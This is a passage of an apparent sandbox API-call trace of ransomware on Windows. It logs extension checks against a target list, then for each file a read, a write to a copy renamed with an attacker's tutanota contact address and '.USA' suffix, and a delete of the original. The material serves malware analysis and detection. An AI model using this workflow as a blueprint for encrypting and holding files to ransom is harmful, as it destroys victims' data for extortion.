Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF") returned 76 [0049.324] lstrlenW (lpString=".zip") returned 4 [0049.324] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0049.324] lstrlenW (lpString=".rar") returned 4 [0049.324] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0049.324] lstrlenW (lpString=".bz2") returned 4 [0049.324] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0049.324] lstrlenW (lpString=".7z") returned 3 [0049.324] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0049.324] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF") returned 76 [0049.324] lstrlenW (lpString=".dbf") returned 4 [0049.324] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0049.324] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF") returned 76 [0049.324] lstrlenW (lpString=".1cd") returned 4 [0049.324] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0049.324] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF") returned 76 [0049.325] lstrlenW (lpString=".jpg") returned 4 [0049.325] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0049.325] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF") returned 76 [0049.325] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF") returned 76 [0049.325] lstrlenW (lpString=".doc") returned 4 [0049.325] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0049.325] lstrlenW (lpString=".docx") returned 5 [0049.325] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0049.325] lstrlenW (lpString=".pdf") returned 4 [0049.325] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0049.325] lstrlenW (lpString=".xls") returned 4 [0049.325] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0049.325] lstrlenW (lpString=".xlsx") returned 5 [0049.325] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0049.325] lstrlenW (lpString=".ppt") returned 4 [0049.325] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0049.325] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF") returned 76 [0049.325] lstrlenW (lpString=".zip") returned 4 [0049.325] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0049.325] lstrlenW (lpString=".rar") returned 4 [0049.325] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0049.325] lstrlenW (lpString=".bz2") returned 4 [0049.325] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0049.325] lstrlenW (lpString=".7z") returned 3 [0049.325] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0049.325] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF") returned 76 [0049.325] lstrlenW (lpString=".dbf") returned 4 [0049.325] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0049.325] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF") returned 76 [0049.325] lstrlenW (lpString=".1cd") returned 4 [0049.325] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0049.325] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF") returned 76 [0049.325] lstrlenW (lpString=".jpg") returned 4 [0049.325] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0049.326] lstrcmpiW (lpString1=".CHM", lpString2=".USA") returned -1 [0049.326] lstrlenW (lpString="VBOB6.CHM") returned 9 [0049.326] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbob6.chm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0049.326] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=123956) returned 1 [0049.326] CloseHandle (hObject=0x210) returned 1 [0049.326] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbob6.chm")) returned 0x20 [0049.326] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbob6.chm.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0049.326] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbob6.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0049.326] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0049.327] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0049.327] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbob6.chm.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0 [0049.339] GetLastError () returned 0x0 [0049.339] ReadFile (in: hFile=0x210, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x1e434, lpOverlapped=0x0) returned 1 [0049.342] WriteFile (in: hFile=0x1d0, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x1e440, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x1e440, lpOverlapped=0x0) returned 1 [0049.345] ReadFile (in: hFile=0x210, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0049.345] WriteFile (in: hFile=0x1d0, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xe6, lpOverlapped=0x0) returned 1 [0049.345] SetEndOfFile (hFile=0x1d0) returned 1 [0049.345] CloseHandle (hObject=0x1d0) returned 1 [0049.345] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0049.345] SetEndOfFile (hFile=0x210) returned 1 [0049.347] CloseHandle (hObject=0x210) returned 1 [0049.347] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0049.347] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbob6.chm")) returned 1 [0049.347] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 70 [0049.347] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 70 [0049.347] lstrlenW (lpString=".doc") returned 4 [0049.347] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0049.347] lstrlenW (lpString=".docx") returned 5 [0049.347] lstrcmpiW (lpString1=".docx", lpString2="6.CHM") returned -1 [0049.347] lstrlenW (lpString=".pdf") returned 4 [0049.347] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0049.347] lstrlenW (lpString=".xls") returned 4 [0049.347] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0049.347] lstrlenW (lpString=".xlsx") returned 5 [0049.347] lstrcmpiW (lpString1=".xlsx", lpString2="6.CHM") returned -1 [0049.347] lstrlenW (lpString=".ppt") returned 4 [0049.347] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0049.347] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 70 [0049.347] lstrlenW (lpString=".zip") returned 4 [0049.348] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0049.348] lstrlenW (lpString=".rar") returned 4 [0049.348] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0049.348] lstrlenW (lpString=".bz2") returned 4 [0049.348] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0049.348] lstrlenW (lpString=".7z") returned 3 [0049.348] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0049.348] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 70 [0049.348] lstrlenW (lpString=".dbf") returned 4 [0049.348] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0049.348] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 70 [0049.348] lstrlenW (lpString=".1cd") returned 4 [0049.348] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0049.348] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 70 [0049.348] lstrlenW (lpString=".jpg") returned 4 [0049.348] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0049.348] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 70 [0049.348] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 70 [0049.348] lstrlenW (lpString=".doc") returned 4 [0049.348] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0049.348] lstrlenW (lpString=".docx") returned 5 [0049.348] lstrcmpiW (lpString1=".docx", lpString2="6.CHM") returned -1 [0049.348] lstrlenW (lpString=".pdf") returned 4 [0049.348] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0049.348] lstrlenW (lpString=".xls") returned 4 [0049.348] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0049.348] lstrlenW (lpString=".xlsx") returned 5 [0049.348] lstrcmpiW (lpString1=".xlsx", lpString2="6.CHM") returned -1 [0049.348] lstrlenW (lpString=".ppt") returned 4 [0049.348] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0049.348] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 70 [0049.348] lstrlenW (lpString=".zip") returned 4 [0049.348] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0049.348] lstrlenW (lpString=".rar") returned 4 [0049.348] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0049.349] lstrlenW (lpString=".bz2") returned 4 [0049.349] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0049.349] lstrlenW (lpString=".7z") returned 3 [0049.349] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0049.349] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 70 [0049.349] lstrlenW (lpString=".dbf") returned 4 [0049.349] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0049.349] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 70 [0049.349] lstrlenW (lpString=".1cd") returned 4 [0049.349] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0049.349] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 70 [0049.349] lstrlenW (lpString=".jpg") returned 4 [0049.349] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0049.349] lstrcmpiW (lpString1=".CHM", lpString2=".USA") returned -1 [0049.349] lstrlenW (lpString="VBUI6.CHM") returned 9 [0049.349] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbui6.chm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0 [0049.350] GetFileSizeEx (in: hFile=0x1d0, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=416918) returned 1 [0049.350] CloseHandle (hObject=0x1d0) returned 1 [0049.350] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbui6.chm")) returned 0x20 [0049.350] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbui6.chm.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0049.350] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbui6.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0 [0049.350] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0049.350] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0049.350] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbui6.chm.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0049.351] GetLastError () returned 0x0 [0049.351] ReadFile (in: hFile=0x1d0, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x65c96, lpOverlapped=0x0) returned 1 [0049.360] WriteFile (in: hFile=0x220, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x65ca0, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x65ca0, lpOverlapped=0x0) returned 1 [0049.368] ReadFile (in: hFile=0x1d0, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0049.368] WriteFile (in: hFile=0x220, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xe6, lpOverlapped=0x0) returned 1 [0049.368] SetEndOfFile (hFile=0x220) returned 1 [0049.368] CloseHandle (hObject=0x220) returned 1 [0049.368] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0049.368] SetEndOfFile (hFile=0x1d0) returned 1 [0049.371] CloseHandle (hObject=0x1d0) returned 1 [0049.372] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0049.372] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbui6.chm")) returned 1 [0049.372] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM") returned 70 [0049.372] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM") returned 70 [0049.372] lstrlenW (lpString=".doc") returned 4 [0049.372] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0049.372] lstrlenW (lpString=".docx") returned 5 [0049.372] lstrcmpiW (lpString1=".docx", lpString2="6.CHM") returned -1 [0049.372] lstrlenW (lpString=".pdf") returned 4 [0049.372] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0049.372] lstrlenW (lpString=".xls") returned 4 [0049.372] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0049.372] lstrlenW (lpString=".xlsx") returned 5 [0049.372] lstrcmpiW (lpString1=".xlsx", lpString2="6.CHM") returned -1 [0049.372] lstrlenW (lpString=".ppt") returned 4 [0049.372] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0049.372] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM") returned 70 [0049.372] lstrlenW (lpString=".zip") returned 4 [0049.372] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0049.372] lstrlenW (lpString=".rar") returned 4 [0049.372] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0049.372] lstrlenW (lpString=".bz2") returned 4 [0049.373] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0049.373] lstrlenW (lpString=".7z") returned 3 [0049.373] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0049.373] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM") returned 70 [0049.373] lstrlenW (lpString=".dbf") returned 4 [0049.373] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0049.373] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM") returned 70 [0049.373] lstrlenW (lpString=".1cd") returned 4 [0049.373] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0049.373] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM") returned 70 [0049.373] lstrlenW (lpString=".jpg") returned 4 [0049.373] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0049.790] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM") returned 70 [0049.878] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM") returned 70 [0049.914] lstrlenW (lpString=".doc") returned 4 [0049.914] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0049.933] lstrlenW (lpString=".docx") returned 5 [0049.933] lstrcmpiW (lpString1=".docx", lpString2="6.CHM") returned -1 [0049.933] lstrlenW (lpString=".pdf") returned 4 [0049.933] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0049.933] lstrlenW (lpString=".xls") returned 4 [0049.933] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0049.933] lstrlenW (lpString=".xlsx") returned 5 [0049.933] lstrcmpiW (lpString1=".xlsx", lpString2="6.CHM") returned -1 [0049.933] lstrlenW (lpString=".ppt") returned 4 [0049.933] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0049.933] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM") returned 70 [0049.933] lstrlenW (lpString=".zip") returned 4 [0049.933] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0049.933] lstrlenW (lpString=".rar") returned 4 [0049.933] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0049.933] lstrlenW (lpString=".bz2") returned 4 [0049.933] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0049.933] lstrlenW (lpString=".7z") returned 3 [0049.933] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0049.933] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM") returned 70 [0049.933] lstrlenW (lpString=".dbf") returned 4 [0049.933] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0049.933] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM") returned 70 [0049.933] lstrlenW (lpString=".1cd") returned 4 [0049.933] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0049.933] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM") returned 70 [0049.934] lstrlenW (lpString=".jpg") returned 4 [0049.934] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0049.934] lstrcmpiW (lpString1=".png", lpString2=".USA") returned -1 [0049.934] lstrlenW (lpString="16to9Squareframe_SelectionSubpicture.png") returned 40 [0049.934] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\16to9squareframe_selectionsubpicture.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0050.043] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=3286) returned 1 [0050.043] CloseHandle (hObject=0x210) returned 1 [0050.043] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\16to9squareframe_selectionsubpicture.png")) returned 0x20 [0050.044] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\16to9squareframe_selectionsubpicture.png.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0050.044] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\16to9squareframe_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0050.044] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png") returned 84 [0050.044] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png") returned 84 [0050.044] lstrlenW (lpString=".doc") returned 4 [0050.044] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0050.044] lstrlenW (lpString=".docx") returned 5 [0050.044] lstrcmpiW (lpString1=".docx", lpString2="e.png") returned -1 [0050.044] lstrlenW (lpString=".pdf") returned 4 [0050.044] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0050.044] lstrlenW (lpString=".xls") returned 4 [0050.044] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0050.044] lstrlenW (lpString=".xlsx") returned 5 [0050.044] lstrcmpiW (lpString1=".xlsx", lpString2="e.png") returned -1 [0050.044] lstrlenW (lpString=".ppt") returned 4 [0050.044] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0050.044] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png") returned 84 [0050.044] lstrlenW (lpString=".zip") returned 4 [0050.044] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0050.044] lstrlenW (lpString=".rar") returned 4 [0050.044] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0050.044] lstrlenW (lpString=".bz2") returned 4 [0050.044] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0050.044] lstrlenW (lpString=".7z") returned 3 [0050.044] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0050.044] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png") returned 84 [0050.045] lstrlenW (lpString=".dbf") returned 4 [0050.045] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0050.045] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png") returned 84 [0050.045] lstrlenW (lpString=".1cd") returned 4 [0050.045] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0050.045] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png") returned 84 [0050.045] lstrlenW (lpString=".jpg") returned 4 [0050.045] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0050.045] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png") returned 84 [0050.045] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png") returned 84 [0050.045] lstrlenW (lpString=".doc") returned 4 [0050.045] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0050.045] lstrlenW (lpString=".docx") returned 5 [0050.045] lstrcmpiW (lpString1=".docx", lpString2="e.png") returned -1 [0050.045] lstrlenW (lpString=".pdf") returned 4 [0050.045] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0050.045] lstrlenW (lpString=".xls") returned 4 [0050.045] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0050.045] lstrlenW (lpString=".xlsx") returned 5 [0050.045] lstrcmpiW (lpString1=".xlsx", lpString2="e.png") returned -1 [0050.045] lstrlenW (lpString=".ppt") returned 4 [0050.045] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0050.045] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png") returned 84 [0050.045] lstrlenW (lpString=".zip") returned 4 [0050.045] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0050.045] lstrlenW (lpString=".rar") returned 4 